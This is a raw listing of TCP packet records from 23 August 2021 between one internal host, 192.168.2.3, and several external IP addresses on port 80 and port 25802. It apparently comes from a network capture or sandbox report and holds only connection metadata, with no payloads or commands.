Aug 23, 2021 02:09:13.492876053 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.492959976 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493021011 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493046045 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493079901 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493134975 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493143082 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493191957 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493232012 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493243933 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493295908 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493339062 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493350029 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493383884 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493405104 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493424892 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493457079 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493509054 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493544102 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493565083 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493614912 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493685961 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493726969 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493776083 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493817091 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493853092 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493897915 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.493957043 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.493999958 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494045019 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494098902 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494136095 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494183064 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494240999 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494282961 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494343996 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494401932 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494441032 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494489908 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494534016 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494573116 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494621992 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494676113 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494714022 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494755983 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494807959 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494843006 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494873047 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494898081 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494904041 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494935036 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.494951963 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.494966984 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495006084 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495023012 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495040894 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495071888 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495095015 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495104074 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495146036 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495166063 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495199919 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495229959 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495245934 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495261908 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495292902 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495296955 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495332003 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495367050 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495369911 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495398045 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495429993 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495431900 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495461941 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495492935 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495496035 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495523930 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495556116 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495559931 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495594978 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495629072 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495631933 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495661020 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495692968 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495709896 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495723963 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495754957 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495769978 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495785952 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495816946 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495820999 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495856047 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495889902 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495893002 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495920897 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495951891 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.495956898 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.495999098 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.496033907 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527071953 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527223110 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527309895 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527319908 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527379036 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527435064 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527467966 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527489901 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527509928 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527550936 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527553082 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527595997 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527607918 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527626038 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527654886 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527674913 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527678967 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527694941 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527714014 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527729034 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527734995 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527754068 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527776957 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527777910 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527796984 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.527800083 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527818918 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527837992 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527858973 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527877092 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527896881 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527915955 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527940035 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527961016 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.527980089 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528001070 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528019905 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528038979 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528058052 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528076887 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528101921 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528122902 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528141975 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528161049 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528182030 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528201103 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528219938 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528238058 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528261900 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528283119 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528301954 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528321028 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528340101 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528358936 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528378010 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528397083 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528420925 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528441906 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528460979 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528480053 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528500080 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528517962 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528537035 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528556108 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528579950 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528599977 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528619051 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528639078 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528657913 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528676033 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528695107 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528713942 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528737068 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528758049 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528776884 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528795958 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528815031 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528834105 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528848886 CEST	80	49859	193.142.59.123	192.168.2.3
Aug 23, 2021 02:09:13.528908968 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528938055 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528948069 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528954983 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528960943 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528968096 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528974056 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528980970 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528987885 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.528994083 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529000998 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529007912 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529015064 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529021025 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529030085 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529036999 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529043913 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529050112 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529057026 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529062986 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529069901 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529077053 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529083014 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529088974 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529094934 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529103994 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529110909 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.529117107 CEST	49859	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:09:13.678914070 CEST	49860	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:13.970042944 CEST	80	49860	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:13.970163107 CEST	49860	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:13.970340014 CEST	49860	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:13.970427036 CEST	49860	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:13.992661953 CEST	49852	80	192.168.2.3	220.125.1.129
Aug 23, 2021 02:09:14.260005951 CEST	80	49860	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:14.267323971 CEST	80	49852	220.125.1.129	192.168.2.3
Aug 23, 2021 02:09:15.143187046 CEST	80	49860	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:15.143222094 CEST	80	49860	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:15.143431902 CEST	49860	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:15.791522026 CEST	49860	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:15.912399054 CEST	49861	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:09:16.081305981 CEST	80	49860	222.236.49.124	192.168.2.3
Aug 23, 2021 02:09:16.147070885 CEST	80	49861	218.233.73.202	192.168.2.3
Aug 23, 2021 02:09:16.147217989 CEST	49861	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:09:16.147371054 CEST	49861	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:09:16.147384882 CEST	49861	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:09:16.382256985 CEST	80	49861	218.233.73.202	192.168.2.3
Aug 23, 2021 02:09:17.279186010 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:17.279261112 CEST	49820	25802	192.168.2.3	188.124.36.242
Aug 23, 2021 02:09:17.312810898 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.312962055 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.314012051 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.331056118 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.335248947 CEST	25802	49820	188.124.36.242	192.168.2.3
Aug 23, 2021 02:09:17.338897943 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.338938951 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.339092970 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.339133978 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.356458902 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.356586933 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.357276917 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.357391119 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.357574940 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.357698917 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.373136044 CEST	80	49855	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.373281956 CEST	49855	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.374402046 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.374555111 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.376360893 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.382402897 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.382587910 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383198977 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383245945 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383281946 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383323908 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383366108 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383371115 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.383407116 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.383408070 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.383475065 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.383517981 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.400588036 CEST	80	49861	218.233.73.202	192.168.2.3
Aug 23, 2021 02:09:17.400615931 CEST	80	49861	218.233.73.202	192.168.2.3
Aug 23, 2021 02:09:17.400696993 CEST	49861	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:09:17.400751114 CEST	49861	80	192.168.2.3	218.233.73.202
Aug 23, 2021 02:09:17.409122944 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409147978 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409158945 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409173012 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409183025 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409200907 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409240961 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409265041 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.409271955 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409368992 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.409414053 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.409420967 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.409811020 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.409867048 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.434525967 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.434545994 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.434654951 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.434655905 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.434739113 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.434756041 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.434763908 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.434828997 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.435826063 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.435944080 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437227964 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437246084 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437256098 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437269926 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437283993 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437299013 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.437314034 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.453037977 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.456195116 CEST	49864	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:09:17.460047007 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.460064888 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.460074902 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.461587906 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.461714983 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.462582111 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.462658882 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.471911907 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.472038031 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.479151011 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.479182959 CEST	80	49858	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.479332924 CEST	49858	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.482781887 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.482918024 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.497149944 CEST	80	49863	185.206.180.136	192.168.2.3
Aug 23, 2021 02:09:17.497205019 CEST	49863	80	192.168.2.3	185.206.180.136
Aug 23, 2021 02:09:17.523211002 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.523332119 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.523576021 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.523665905 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.583868980 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.583981991 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.584789991 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.584809065 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.584827900 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.584839106 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.584882975 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.584924936 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.584939957 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.585241079 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.585305929 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.585311890 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.585525990 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.585628986 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.585701942 CEST	49862	80	192.168.2.3	185.215.113.206
Aug 23, 2021 02:09:17.585764885 CEST	80	49862	185.215.113.206	192.168.2.3
Aug 23, 2021 02:09:17.585820913 CEST	49862	80	192.168.2.3	185.215.113.206
